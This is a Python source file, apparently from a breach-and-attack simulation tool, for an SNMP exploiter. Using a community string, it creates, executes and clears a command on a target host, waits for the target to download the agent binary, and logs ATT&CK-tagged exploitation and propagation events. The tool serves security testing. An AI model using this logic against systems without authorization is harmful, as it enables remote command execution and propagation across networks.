from functools import partial, wraps
from ipaddress import IPv4Address
from logging import getLogger
from time import time
from typing import Callable, Tuple, Type

from common.agent_events import ExploitationEvent, PropagationEvent
from common.event_queue import IAgentEventPublisher
from common.tags.attack import (
    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    INGRESS_TOOL_TRANSFER_T1105_TAG,
)
from common.types import AgentID, Event
from common.utils.code_utils import insecure_generate_random_string
from infection_monkey.i_puppet import TargetHost

from .snmp_client import SNMPClient
from .snmp_options import SNMPOptions

logger = getLogger(__name__)

# Length passed to insecure_generate_random_string when naming SNMP commands created
# on a target (see SNMPExploitClient's default generate_command_name)
COMMAND_NAME_LENGTH = 6

# Tag shared by both kinds of events published by SNMPExploitClient
SNMP_EXPLOITER_TAG = "snmp-exploiter"

# Tags attached to the ExploitationEvent published after each exploitation attempt
EXPLOITATION_TAGS = (
    SNMP_EXPLOITER_TAG,
    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
)

# Tags attached to the PropagationEvent published after each exploitation attempt
PROPAGATION_TAGS = (
    SNMP_EXPLOITER_TAG,
    INGRESS_TOOL_TRANSFER_T1105_TAG,
)


def repeat_on_error(
    max_times: int = 3, error_types: Tuple[Type[BaseException], ...] = (Exception,)
):
    """
    Decorator to repeat a command if it fails with an error

    The decorated function is called up to `max_times` times. An error of one of
    `error_types` raised by any attempt except the last is logged, and the function is
    called again. An error raised by the final attempt propagates to the caller. Errors
    of any other type propagate immediately, without a retry. At least one attempt is
    always made, even if `max_times` is less than 1.

    :param max_times: The maximum number of times to call the decorated function
    :param error_types: The exception types that trigger a retry
    :return: A decorator that wraps a function with this retry behavior
    """

    def decorator(func):
        @wraps(func)
        def inner(*args, **kwargs):
            # Every attempt but the last swallows (and logs) the retryable errors
            for _ in range(max_times - 1):
                try:
                    return func(*args, **kwargs)
                except error_types as err:
                    logger.debug(f"Retrying due to error: {err}")

            # Allow the exception on the last try to bubble up
            return func(*args, **kwargs)

        return inner

    return decorator


class SNMPExploitClient:
    """
    Exploits a host by creating and executing a command on it through SNMP

    After each exploitation attempt, an ExploitationEvent and a PropagationEvent describing
    the outcome are published.
    """

    def __init__(
        self,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        exploiter_name: str,
        snmp_client: SNMPClient,
        generate_command_name: Callable[[], str] = partial(
            insecure_generate_random_string, COMMAND_NAME_LENGTH
        ),
    ):
        """
        :param agent_id: The ID of this agent; used as the source of published events
        :param agent_event_publisher: The publisher used to publish exploitation and
            propagation events
        :param exploiter_name: The exploiter name included in published events
        :param snmp_client: The client used to create, execute, and clear SNMP commands
        :param generate_command_name: A callable that returns a name for each SNMP command
            created on a target. By default, insecure_generate_random_string is called
            with a length of COMMAND_NAME_LENGTH.
        """
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
        self._exploiter_name = exploiter_name
        self._snmp_client = snmp_client
        self._generate_command_name = generate_command_name

    def exploit_host(
        self,
        host: TargetHost,
        community_string: str,
        command: str,
        agent_binary_downloaded: Event,
        options: SNMPOptions,
    ) -> Tuple[bool, bool]:
        """
        Exploit the host using SNMP using the provided community string

        :param host: The host to exploit
        :param community_string: The community string to use
        :param command: The command to execute
        :param agent_binary_downloaded: An event that will be set when the agent binary is
            downloaded
        :param options: The SNMP options
        :return: A tuple of two booleans: the first indicates whether the exploitation was
            successful, and the second indicates whether the propagation was successful
        """
        exploitation_message = ""
        exploitation_success = True

        # Both events are stamped with the time the attempt started
        timestamp = time()
        try:
            self._exploit(host.ip, community_string, command)
        except Exception as err:
            logger.exception(f"Attempt to exploit {host.ip} failed due to error: {err}")
            exploitation_message = f"{err}"
            exploitation_success = False

        propagation_success = self._evaluate_propagation_success(
            exploitation_success, agent_binary_downloaded, options.agent_binary_download_timeout
        )

        self._publish_exploitation_event(
            host, timestamp, exploitation_success, exploitation_message
        )
        self._publish_propagation_event(host, timestamp, propagation_success)

        return exploitation_success, propagation_success

    def _exploit(self, target_ip: IPv4Address, community_string: str, command: str):
        """
        Create a command on the target, execute it, and then remove it

        Errors raised while creating or executing the command propagate to the caller.
        Removing the command is best-effort. A failure to remove it is logged, not
        raised, so that it neither replaces an error raised by the execution nor turns a
        successful execution into a reported exploitation failure.
        """
        command_name = self._create_command(target_ip, community_string, command)
        try:
            self._snmp_client.execute_command(target_ip, command_name, community_string)
        finally:
            self._clear_command(target_ip, command_name, community_string)

    def _clear_command(self, target_ip: IPv4Address, command_name: str, community_string: str):
        """Remove a previously created command from the target, logging any failure."""
        try:
            self._snmp_client.clear_command(target_ip, command_name, community_string)
        except Exception as err:
            logger.warning(f"Failed to clear SNMP command {command_name} on {target_ip}: {err}")

    @repeat_on_error(max_times=3)
    def _create_command(self, target_ip: IPv4Address, community_string: str, command: str) -> str:
        """
        Create a command on the target and return its name

        Up to 3 attempts are made. Each attempt generates a fresh command name.
        """
        command_name = self._generate_command_name()
        logger.debug(f"Creating SNMP command {command_name} on {target_ip}")

        self._snmp_client.create_command(target_ip, command_name, community_string, command)

        return command_name

    def _publish_exploitation_event(
        self, host: TargetHost, timestamp: float, success: bool, message: str
    ):
        """Publish an ExploitationEvent for `host` tagged with EXPLOITATION_TAGS."""
        self._agent_event_publisher.publish(
            ExploitationEvent(
                source=self._agent_id,
                target=host.ip,
                timestamp=timestamp,
                tags=frozenset(EXPLOITATION_TAGS),
                success=success,
                exploiter_name=self._exploiter_name,
                error_message=message,
            )
        )

    def _publish_propagation_event(self, host: TargetHost, timestamp: float, success: bool):
        """Publish a PropagationEvent for `host` tagged with PROPAGATION_TAGS."""
        self._agent_event_publisher.publish(
            PropagationEvent(
                source=self._agent_id,
                target=host.ip,
                timestamp=timestamp,
                tags=frozenset(PROPAGATION_TAGS),
                success=success,
                exploiter_name=self._exploiter_name,
            )
        )

    @staticmethod
    def _evaluate_propagation_success(
        exploitation_success: bool,
        agent_binary_downloaded: Event,
        agent_binary_download_timeout: float,
    ) -> bool:
        """
        Determine whether the agent binary was downloaded by the target

        Returns False immediately if exploitation failed. Otherwise, waits up to
        `agent_binary_download_timeout` for `agent_binary_downloaded` to be set.
        """
        if not exploitation_success:
            return False

        logger.debug("Waiting for the target to download the agent binary...")
        agent_binary_downloaded.wait(agent_binary_download_timeout)

        return agent_binary_downloaded.is_set()
